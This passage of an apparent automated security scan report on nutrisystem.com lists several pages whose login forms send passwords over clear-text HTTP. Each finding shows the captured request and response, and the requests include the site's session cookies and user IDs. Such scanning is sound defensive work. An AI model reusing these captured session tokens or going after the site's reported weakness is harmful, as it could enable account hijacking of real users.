<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html class="dj_gecko dj_ff3 dj_contentbox">
<head>
<meta http-equiv="Content-Type" con
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/giftcards/giftcard_selection_page.jsp.login" name="login" method="post" id="loginForm"><input value="ISO-8859-1" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.23. http://www.nutrisystem.com/jsps_hmr/guarantee/index.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/guarantee/index.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/guarantee/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" c
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/guarantee/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.24. http://www.nutrisystem.com/jsps_hmr/help/contact.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/help/contact.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/help/contact.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 04:07:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Content-Type"
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/help/contact.jsp.login" name="login" method="post" id="loginForm"><input value="ISO-8859-1" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.25. http://www.nutrisystem.com/jsps_hmr/help/site_map.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/help/site_map.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/help/site_map.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 04:07:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Content-Type"
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/help/site_map.jsp.login" name="login" method="post" id="loginForm"><input value="ISO-8859-1" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.26. http://www.nutrisystem.com/jsps_hmr/home/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/home/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/home/ HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:15:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatibl
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/home/.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.27. http://www.nutrisystem.com/jsps_hmr/home/index.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/home/index.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/home/index.jsp?_requestid=566196 HTTP/1.1
Host: www.nutrisystem.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; DYN_USER_ID=242836360; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; NSOfmCookieMarker=include

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: NSOfmCookieMarker=exclude; Domain=.nutrisystem.com; Expires=Fri, 11-Jan-2013 02:48:28 GMT; Path=/
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 02:48:28 GMT
Content-Length: 67789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatibl
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/home/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.28. http://www.nutrisystem.com/jsps_hmr/how_it_works/index.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/how_it_works/index.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/how_it_works/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <!-- Defect #671 - Need to inclu
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/how_it_works/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.29. http://www.nutrisystem.com/jsps_hmr/privacy/index.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/privacy/index.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/privacy/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/privacy/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.30. http://www.nutrisystem.com/jsps_hmr/product-pages/diabetic_overview.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/product-pages/diabetic_overview.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/product-pages/diabetic_overview.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<script type="text/javascript" src='/js/foresee/foresee-trigger.js'></script>
   <script t
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/product-pages/diabetic_overview.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.31. http://www.nutrisystem.com/jsps_hmr/product-pages/mens_overview.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/product-pages/mens_overview.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/product-pages/mens_overview.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <meta http-equiv="P3P" content='
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/product-pages/mens_overview.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.32. http://www.nutrisystem.com/jsps_hmr/product-pages/womens_overview.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/product-pages/womens_overview.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/product-pages/womens_overview.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="P3P" content='pol
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/product-pages/womens_overview.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.33. http://www.nutrisystem.com/jsps_hmr/shop/order_now.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/shop/order_now.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/shop/order_now.jsp?categoryId=384 HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
